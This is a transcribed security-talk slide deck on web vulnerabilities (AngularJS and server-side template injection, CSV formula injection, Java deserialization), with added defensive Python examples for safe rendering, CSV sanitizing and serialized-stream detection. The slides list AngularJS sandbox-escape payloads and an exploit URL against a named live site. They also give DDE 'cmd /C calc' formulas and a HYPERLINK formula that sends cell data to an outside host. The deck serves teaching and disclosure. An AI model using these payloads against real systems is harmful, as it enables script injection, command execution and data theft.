![Page 1: Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application](https://reader035.vdocument.in/reader035/viewer/2022062218/587795721a28ab0f778b5d13/html5/thumbnails/1.jpg)
Some new vulnerabilities in modern web applications
(Part 1)
hkln1 (@anh_npt)
Thank you to the sponsors
AngularJS Template Injection (Client-side template injection)
What is AngularJS?
• Popular MVC JavaScript framework
• Maintained and recommended by Google
• Read more: https://docs.angularjs.org/tutorial
What's the risk? (1)
Not vulnerable
What's the risk? (2)
???
Four general attack vectors
1. Attacking the Sandbox
2. Attacking the Sanitizer
3. Attacking the CSP Mode
4. Attacking the Codebase
The payloads…
• 1.0.1 - 1.1.5: `{{constructor.constructor('alert(1)')()}}`
• 1.2.0 - 1.2.1: `{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}`
• …
• 1.4.0 - 1.4.9: `{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}`
• 1.5.0-rc2: Fixed
AngularJS injection in the wild (1)
• https://hackerone.com/reports/125027
AngularJS injection in the wild (2)
• Check: https://developer.uber.com/docs/deeplinking?q=wrtz{{7*7}}
• Response: wrtz49 (vulnerable)
• Exploit: https://developer.uber.com/docs/deep-linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz
Demo
• Piwik
Reference
• http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
• http://www.slideshare.net/x00mario/an-abusive-relationship-with-angularjs
Server-side template injection
What is a template engine? (1)
• Presents dynamic data via web pages and emails.
• Separation of presentation (HTML/CSS) from application logic.
• Used in wikis, blogs, marketing applications and CMS.
• Some template engines:
  • FreeMarker
  • Velocity
  • Smarty
  • Twig
  • Jade
What is a template engine? (2)
Plain PHP, unescaped vs. escaped output:
`<?php echo $param ?>`
`<?php echo htmlspecialchars($var, ENT_QUOTES, 'UTF-8') ?>`
Template syntax, unescaped vs. escaped output:
`{{ param }}`
`{{ param | escape }}` / `{{ param | e }}`
What's the risk?
• Not only XSS: Remote Code Execution (RCE)
• Arbitrary object creation
• Arbitrary file read/write
• Remote file include
• Information disclosure and privilege escalation
Introduction (1)
• `$output = $twig->render("Dear {first_name},", array("first_name" => $user->first_name));` Not vulnerable
• `$output = $twig->render($_GET['custom_email'], array("first_name" => $user->first_name));` ???
Introduction (2)
• `custom_email={{7*7}}` → 49
• `custom_email={{self}}` → Object of class __TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78db3538221c1145580ca4a5 could not be converted to string
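A way to keep the "custom e-mail" feature from the slide above without ever handing the user's text to the template engine, as an added Python example (not code from the talk). The allowed placeholder names, the single-brace placeholder syntax and the optional Jinja2 contrast function are my assumptions; the inputs are constructed from the slide's own probes.

```python
import re

# Placeholders a user may put in a custom e-mail body. Only these names are
# substituted; anything else in the text stays literal.
ALLOWED_PLACEHOLDERS = {"first_name", "last_name"}
PLACEHOLDER_RE = re.compile(r"\{([A-Za-z_][A-Za-z0-9_]*)\}")

def render_custom_email(custom_email, values):
    """Safe counterpart of the slide's render($_GET['custom_email'], ...): the
    user-controlled text is treated purely as data. A tiny fixed placeholder
    syntax is expanded by plain substitution, so no engine ever evaluates
    {{7*7}}, {{self}} or any other expression hidden in the text."""
    def substitute(match):
        key = match.group(1)
        if key in ALLOWED_PLACEHOLDERS and key in values:
            return str(values[key])
        return match.group(0)          # unknown placeholder: left as written
    return PLACEHOLDER_RE.sub(substitute, custom_email)

def render_unsafe_jinja2(custom_email, values):
    """The vulnerable shape from the slide, in Jinja2 (the engine of the Flask
    demo): the attacker-controlled string becomes the template itself. Kept only
    to contrast with render_custom_email; it needs the jinja2 package, which is
    why the import is lazy (assumed dependency, not part of the talk)."""
    from jinja2 import Environment, BaseLoader
    env = Environment(loader=BaseLoader(), autoescape=True)
    return env.from_string(custom_email).render(**values)

# Constructed inputs: a legitimate custom greeting, the two probes from the
# "Introduction (2)" slide, and a placeholder that is not on the allow-list.
SAMPLE_VALUES = {"first_name": "Alice", "last_name": "Example"}
SAMPLE_INPUTS = [
    "Dear {first_name} {last_name},",
    "Dear {first_name}, {{7*7}}",
    "{{self}}",
    "{password}",
]

if __name__ == "__main__":
    for text in SAMPLE_INPUTS:
        print(repr(text), "->", repr(render_custom_email(text, SAMPLE_VALUES)))
    try:
        print("unsafe:", repr(render_unsafe_jinja2(SAMPLE_INPUTS[1], SAMPLE_VALUES)))
    except ImportError:
        print("jinja2 not installed; skipping the vulnerable rendering")
```

With jinja2 installed the unsafe function prints the `49` that the slide shows, while `render_custom_email` returns the braces untouched.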
Template injection methodology
Detect (1)
• Plaintext context

| Request | Response |
|---|---|
| smarty=Hello {user.name} | Hello user1 |
| freemarker=Hello ${username} | Hello user1 |
| any=<b> Hello </b> | <b> Hello </b> |
| smarty=Hello ${7*7} | Hello 49 |
| freemarker=Hello ${7*7} | Hello 49 |
Detect (2)
• Code context

| Request | Response |
|---|---|
| Personal_greeting=username | Hello user1 |
| Personal_greeting=username<tag> | Hello |
| Personal_greeting=username }} <tag> | Hello user01 <tag> |
Identify
Exploit
• 'For Template Authors' - sections covering basic syntax.
• 'Security Considerations' - chances are whoever developed the app you're testing didn't read this, and it may contain some useful hints.
• Lists of builtin methods, functions, filters, and variables.
• Lists of extensions/plugins - some may be enabled by default.
Payloads: Smarty (1)
Payloads: Smarty (2)
Payloads: Smarty (3)
Payloads: Smarty (4)
Payloads: Twig
Payloads: Twig (Sandboxed)
Payloads: Jade
Payloads: FreeMarker
Server-side template injection in the wild
• https://hackerone.com/reports/125980
Demo
• Flask/Jinja2
• Alfresco
Reference
• http://blog.portswigger.net/2015/08/server-side-template-injection.html
• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/
• https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii
Formula Injection (CSV Injection)
What is CSV Injection?
• Exploited via export functionality that allows users to download a CSV (Excel) file.
• Such exports often contain input from untrusted sources such as survey responses, transaction details, and user-supplied addresses, …
• The attacker can execute any commands on the user's machine if the web application does not properly validate the contents of the CSV file.
How to test?

| Cell content | Result when opened |
|---|---|
| =1 + 1 | 2 |
| -2 + 3 | 1 |
| +3 + 5 | 8 |
The payloads…
• `=HYPERLINK(https://example.com?test=&A1&A2,"Error: please click for further information")`
• `=DDE("cmd";"/C calc"; "DdeLink_60_870516294")`
• `=cmd | ' /C calc ' !A0`
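Hardening the export side against the cells on the "How to test?" and payload slides, as an added Python example rather than code from the talk: it neutralizes formula-leading cells on write and audits an existing CSV for cells a spreadsheet would evaluate. The trigger list, function names and the sample survey rows are my assumptions.

```python
import csv
import io

# Leading characters that spreadsheet applications treat as the start of a
# formula (as listed on the OWASP CSV injection page): the three from the
# "How to test?" slide plus '@', tab and carriage return.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def is_formula_like(cell):
    """True if a spreadsheet would evaluate this cell instead of showing it as
    text. Only strings are checked, so numeric cells such as -5 stay numbers."""
    return isinstance(cell, str) and cell.startswith(FORMULA_TRIGGERS)

def neutralize_cell(cell):
    """Prefix a formula-like cell with a single quote so Excel/LibreOffice keep
    it as a literal string; every other value is returned unchanged."""
    return "'" + cell if is_formula_like(cell) else cell

def export_csv(rows, neutralize=True):
    """Write rows (lists of cells) as CSV text. neutralize=True is the hardened
    export; neutralize=False reproduces the vulnerable export for comparison."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) for c in row] if neutralize else row)
    return buf.getvalue()

def audit_csv(text):
    """Review an already-exported CSV: return (row, column, cell) for every
    cell a spreadsheet would evaluate as a formula."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings

# Constructed survey export: the probes from the "How to test?" slide and a
# HYPERLINK-style cell mixed with ordinary answers.
SAMPLE_ROWS = [
    ["respondent", "answer"],
    ["alice", "=1 + 1"],
    ["bob", "-2 + 3"],
    ["carol", "+3 + 5"],
    ["dave", '=HYPERLINK("https://example.com","click")'],
    ["erin", "just text"],
]

if __name__ == "__main__":
    print("unsafe export flags:", audit_csv(export_csv(SAMPLE_ROWS, neutralize=False)))
    print("hardened export flags:", audit_csv(export_csv(SAMPLE_ROWS)))
    print(export_csv(SAMPLE_ROWS))
```

Some spreadsheet versions display the leading apostrophe as part of the cell; that visible character is the accepted trade-off for not having the cell evaluated.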
CSV Injection in the wild
Demo
• Magento Community
Reference
• https://www.owasp.org/index.php/CSV_Excel_Macro_Injection
• https://hackerone.com/reports/72785
• http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
Java deserialization vulnerability
What is serialization? (1)
What is serialization? (2)
More complex serialization… (1)
More complex serialization… (2)
Serialization in the context of Java web applications and application servers
• In HTTP requests – Parameters, ViewState, Cookies
• RMI – The extensively used Java RMI protocol
• RMI over HTTP – Many Java thick client web apps use this
• JMX
• Custom Protocols
What's the problem?
• What if we knew of an object that implemented a "readObject" method that did something dangerous?
• What if instead of appending an exclamation point to a user-defined string?
How to identify whether an application might be vulnerable?
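One answer to the identification question from the request side, as an added Python example that is not from the talk: it scans parameter, cookie and body values for the Java serialization stream header in raw, base64 and hex form and reads out the first class name for triage. The field names, function names and the sample stream are constructed assumptions.

```python
import base64
import re

# Java serialization header (STREAM_MAGIC 0xACED, STREAM_VERSION 5) and the
# same four bytes as they appear when the stream is base64- or hex-encoded.
JAVA_MAGIC = b"\xac\xed\x00\x05"
B64_PREFIX = "rO0AB"
HEX_PREFIX = "aced0005"

def decode_candidate(value):
    """Return (encoding, raw_bytes) if value carries a Java serialized stream
    as raw bytes, standard base64 or hex; otherwise None."""
    if isinstance(value, bytes):
        return ("raw", value) if value.startswith(JAVA_MAGIC) else None
    if value.startswith(B64_PREFIX):
        try:
            raw = base64.b64decode(value + "=" * (-len(value) % 4))
        except ValueError:          # binascii.Error is a ValueError
            return None
        return ("base64", raw) if raw.startswith(JAVA_MAGIC) else None
    if value.lower().startswith(HEX_PREFIX) and re.fullmatch(r"(?:[0-9a-fA-F]{2})+", value):
        return ("hex", bytes.fromhex(value))
    return None

def first_class_name(raw):
    """Triage helper: the class named by the first descriptor, expecting
    TC_OBJECT (0x73) TC_CLASSDESC (0x72) and a length-prefixed UTF name right
    after the header; None for any other stream shape."""
    body = raw[4:] if raw.startswith(JAVA_MAGIC) else b""
    if body[:2] != b"\x73\x72" or len(body) < 4:
        return None
    length = int.from_bytes(body[2:4], "big")
    name = body[4:4 + length]
    return name.decode("utf-8", errors="replace") if len(name) == length else None

def find_java_serialized(fields):
    """Scan a mapping of parameter/cookie/body names to values and report the
    ones carrying a serialized object, with its encoding and leading class."""
    hits = {}
    for name, value in fields.items():
        found = decode_candidate(value)
        if found:
            hits[name] = {"encoding": found[0], "class": first_class_name(found[1])}
    return hits

# Constructed request: one stream whose first descriptor is java.util.HashMap
# (17-byte name, then its serialVersionUID), carried raw, base64- and hex-encoded.
SAMPLE_STREAM = JAVA_MAGIC + b"sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16\x60\xd1"
SAMPLE_REQUEST = {
    "ViewState": base64.b64encode(SAMPLE_STREAM).decode(),
    "JSESSIONID": "A1B2C3D4E5F6",
    "blob": SAMPLE_STREAM.hex(),
    "rmi_body": SAMPLE_STREAM,
}
```

Calling `find_java_serialized(SAMPLE_REQUEST)` flags three of the four fields; a hit is a reason to look at what deserializes that field, not proof of exploitability.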
Java deserialization vulnerability in the wild
• http://artsploit.blogspot.com/2016/01/paypal-rce.html
Analysis of exploiting the real cases – JBoss application (1)
1. Identify
Analysis of exploiting the real cases – JBoss application (2)
2. Exploit
Demo
Analysis of exploiting the real cases – Jenkins application (1)
1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins application (2)
1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins application (3)
1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins application (3)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (3)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (3)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (4)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (5)
2. Exploit Development
Demo
Reference
• https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
• http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
• https://www.youtube.com/watch?v=VviY3O-euVQ